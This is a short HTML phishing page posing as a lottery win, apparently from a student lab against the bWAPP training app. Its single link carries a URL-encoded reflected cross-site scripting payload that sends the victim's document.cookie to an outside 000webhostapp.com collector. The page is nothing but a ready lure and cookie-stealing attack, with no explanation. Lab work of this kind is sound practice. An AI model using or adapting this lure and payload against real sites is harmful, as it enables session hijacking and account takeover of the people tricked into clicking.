<html>
    <head>
        <title>Lottery</title>
    </head>
    <body>
        <h1 align="center">CONGRATULATIONS!!!</h1>
        <h1 align="center">YOU WON!!!</h1>
        Click this 
        <a href="http://localhost/HPTN2/13.at160610.nguyenbadat5/bWAPP/xss_get.php?firstname=%3Cscript%3Ewindow.open%28%27https%3A%2F%2Fat160610datnb.000webhostapp.com%2Fget.php%3Fcookie%3D%27%2Bdocument.cookie%29%3C%2Fscript%3E&lastname=a&form=submit">
            link 
        </a> to see your prize
    </body>
</html>

